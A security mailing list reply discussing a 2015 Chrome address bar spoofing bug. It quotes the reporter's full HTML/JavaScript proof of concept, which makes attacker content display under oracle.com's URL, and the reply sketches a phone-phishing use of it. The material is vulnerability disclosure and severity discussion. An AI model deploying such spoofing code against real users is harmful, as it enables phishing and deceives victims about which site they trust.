Can you perform any actions on the page once the URL is replaced, or is it non responsive? (asking because PoC did not work on my Chrome 43.0.2357.130 (64-bit) on OSX). If it is non responsive then the impact is very limited. Worst thing I can think of is showing "your account is suspended, please contact technical support on 0800-555-555" and then using the trust user puts in the URL for phone phishing. If it is responsive, then it's indeed pretty bad.
Cheers! V. On Tue, Jun 30, 2015 at 6:08 PM, David Leo <david....@deusen.co.uk> wrote: > Impact: > The "click to verify" thing is completely broken... > Anyone can be "BBB Accredited Business" etc. > You can make whitehouse.gov display "We love Islamic State" :-) > > Note: > No user interaction on the fake page. > > Code: > ***** index.html > <script> > function next() > { > w.location.replace('http://www.oracle.com/index.html?'+n);n++; > setTimeout("next();",15); > setTimeout("next();",25); > } > function f() > { > w=window.open("content.html","_blank","width=500 height=500"); > > i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5); > } > </script> > <a href="#" onclick="f()">Go</a><br> > ***** content.html > <b>This web page is NOT oracle.com</b> > <script>location="http://www.oracle.com/index.html";</script> > ***** It's online > http://www.deusen.co.uk/items/gwhere.6128645971389012/ > (The page says "June/16/2015" - it works as we tested today) > > Request For Comment: > We reported this to Google. > They reproduced, and say > It's DoS which doesn't matter. > We think it's very strange, > since the browser does not crash(not DoS), > and the threat is obvious. > What's your opinion? > > Kind Regards, > > PS > We love clever tricks. > We love this: > http://dieyu.org/ > > _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/